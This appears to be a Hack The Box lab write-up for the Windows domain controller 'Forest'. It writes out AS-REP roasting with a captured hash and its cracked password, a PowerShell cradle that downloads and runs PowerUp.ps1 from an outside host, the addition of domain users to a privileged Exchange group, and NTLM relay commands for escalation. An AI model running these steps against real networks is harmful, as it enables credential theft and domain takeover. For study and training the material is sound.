htb-windows-Forest

Introduction

Information gathering

Port scan

$ nmap -sC -sV -p53,88,135,139,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49670,49676,49677,49684,49695,49714 --script=vuln -oA scan/Forest-vuln 10.10.10.161
# Nmap 7.70 scan initiated Thu Dec 12 21:33:22 2019 as: nmap -sC -sV -p53,88,135,139,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49670,49676,49677,49684,49695,49714 --script=vuln -oA scan/Forest-vuln 10.10.10.161
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.29s latency).

PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-12 13:40:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_sslv2-drown:
3269/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=12/12%Time=5DF241D3%P=x86_64-apple-darwin17.3.0
SF:%r(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07v
SF:ersion\x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 12 21:52:39 2019 -- 1 IP address (1 host up) scanned in 1156.80 seconds

Nmap finds a large number of MSRPC services open, plus LDAP and others. With this many ports it is hard to know where to start, so begin with SMB and look for problems on the shares.

SMB check

$ enum4linux 10.10.10.161

This shows the machine is domain-joined, with two domains, HTB and Builtin, and the users Administrator, Guest, krbtgt, sebastien, lucinda, svc-alfresco, andy, mark and santi. Cross-checking with ldapuserenum.py confirms that all of these users exist.

Tried ldapdomaindump; it failed.

A tip found on the forum: "Try to use impacket G********S.py to get the hash." The matching tools in impacket are
GetADUsers.py, GetNPUsers.py and GetUserSPNs.py; the one that fits is GetNPUsers.py:

$ GetNPUsers.py  HTB/ -no-pass -usersfile users.txt -dc-ip 10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB:16bc5d76d80496359fc7671d2ecd1c4b$1399af139dca1ce7ed94df93191182777e221cd02490d48189ea28a325e75d9d3e8aaa8cfd4564fa44ed95c749f3d8b2822385e28a391a982ecca98cb53d8b431dd892ebfcf600766826baaefe8a14cfe55a24273067dc44b9c17417c23a0d0e89a3180db67c18081fee300523f7c426c7d91a8858b36fbcd717f732776ba612d6b762ad0b2620c59e9c755c77d656a5bcd28a1bea2aeeb20eb6c0ac294c83dfa29db77bddd2ea079102f64bae4cfbf47fbf90051744fdf9169fa6f980a999b71015010fab15bb2db8df0403931f2750391800ef1835cbb9f3a44bb6aacc566f
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

This yields the TGT (AS-REP) material for the svc-alfresco user. GetNPUsers.py lists the users that have the "Do not require Kerberos preauthentication" attribute (UF_DONT_REQUIRE_PREAUTH) set and requests a TGT for each of them. For users with that configuration it emits John The Ripper formatted output, which can be cracked directly with john.
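The defender's side of the same check, as an added example that is not part of the original write-up: decode the userAccountControl bits GetNPUsers.py keys on and build the LDAP filter an administrator would run to find such accounts before an attacker does. The records are constructed sample data, not output from the Forest machine.

```python
# Added example, not from the original write-up: audit LDAP user records for the
# UF_DONT_REQUIRE_PREAUTH flag that GetNPUsers.py keys on. SAMPLE_RECORDS is
# constructed data, not output from the Forest machine.

UF_ACCOUNTDISABLE = 0x0002          # account is disabled
UF_NORMAL_ACCOUNT = 0x0200          # ordinary user account
UF_DONT_EXPIRE_PASSWD = 0x10000     # password never expires
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

# LDAP filter using the bitwise-AND matching rule (OID 1.2.840.113556.1.4.803)
# to ask the DC directly for users with the preauth bit (0x400000 = 4194304) set.
ASREP_AUDIT_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))"
)

# Constructed sample: (sAMAccountName, userAccountControl)
SAMPLE_RECORDS = [
    ("sebastien", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD),
    ("svc-alfresco", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH),
    ("old-svc", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH),
]


def decode_uac(value):
    """Names of the known userAccountControl bits set in value, in bit order."""
    return [name for bit, name in FLAG_NAMES.items() if value & bit]


def asrep_roastable(records):
    """Accounts the KDC would answer without preauthentication: the flag is set
    and the account is enabled. A disabled account is refused with
    KDC_ERR_CLIENT_REVOKED instead, which is what Guest produces above."""
    return [
        name for name, uac in records
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE
    ]


if __name__ == "__main__":
    for name, uac in SAMPLE_RECORDS:
        print(f"{name:14} 0x{uac:06x} {decode_uac(uac)}")
    print("needs review:", asrep_roastable(SAMPLE_RECORDS))
```

Feeding ASREP_AUDIT_FILTER to any LDAP client against a DC returns the same account list that GetNPUsers.py discovers by trial, so the flag can be cleared or the account given a long random password before it is roasted.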

Crack the TGT

# Crack with Rubeus
$ .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
# Crack with john
$ john --wordlist=passwords_kerb.txt hashes.asreproast
# Crack with hashcat
$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

$krb5asrep$23$svc-alfresco@HTB:16bc5d76d80496359fc7671d2ecd1c4b$1399af139dca1ce7ed94df93191182777e221cd02490d48189ea28a325e75d9d3e8aaa8cfd4564fa44ed95c749f3d8b2822385e28a391a982ecca98cb53d8b431dd892ebfcf600766826baaefe8a14cfe55a24273067dc44b9c17417c23a0d0e89a3180db67c18081fee300523f7c426c7d91a8858b36fbcd717f732776ba612d6b762ad0b2620c59e9c755c77d656a5bcd28a1bea2aeeb20eb6c0ac294c83dfa29db77bddd2ea079102f64bae4cfbf47fbf90051744fdf9169fa6f980a999b71015010fab15bb2db8df0403931f2750391800ef1835cbb9f3a44bb6aacc566f:s3rvice

This gives the credentials HTB/svc-alfresco : s3rvice.

user:svc-alfresco

Use smbmap to list the shares this account can access:

owef@owefsad:~$ smbmap -u  'svc-alfresco' -p 's3rvice' -d HTB  -H 10.10.10.161
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.161...
[+] IP: 10.10.10.161:445 Name: forest.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
< ... >
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share

Use smbclient to look at the actual files:

$ smbclient.py HTB/svc-alfresco@10.10.10.161/SYSVOl

Log in with evil-winrm on port 47001 and retrieve user.txt:

$ evil-winrm -i 10.10.10.161 -u 'svc-alfresco'
*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/22/2020 2:54:31 AM
Password expires Never
Password changeable 1/23/2020 2:54:31 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/23/2019 3:09:47 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *Service Accounts
The command completed successfully.

Attempt privilege escalation with PowerUp

IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.46/PowerUp.ps1")

//10.10.10.161/SYSVOL

Exchange Windows Permissions

  • HTB\Exchange

net user owef Forest.htb1 /add /domain

net group "Exchange Windows Permissions" owef /add

net group "Exchange Windows Permissions" svc-alfresco /add

net group “domain controllers” /domain

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group

Group Accounts for \\

-------------------------------------------------------------------------------
*$D31000-NSEL5BRJ63V7
*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*DnsUpdateProxy
*Domain Admins - no permissions
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions - has permissions
*ExchangeLegacyInterop
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*test
*UM Management
*View-Only Organization Management
python privexchange.py -ah 10.10.10.161 10.10.10.161 -u svc-alfresco -d HTB

ntlmrelayx.py -t ldap://10.10.10.161 -P --escalate-user svc-alfresco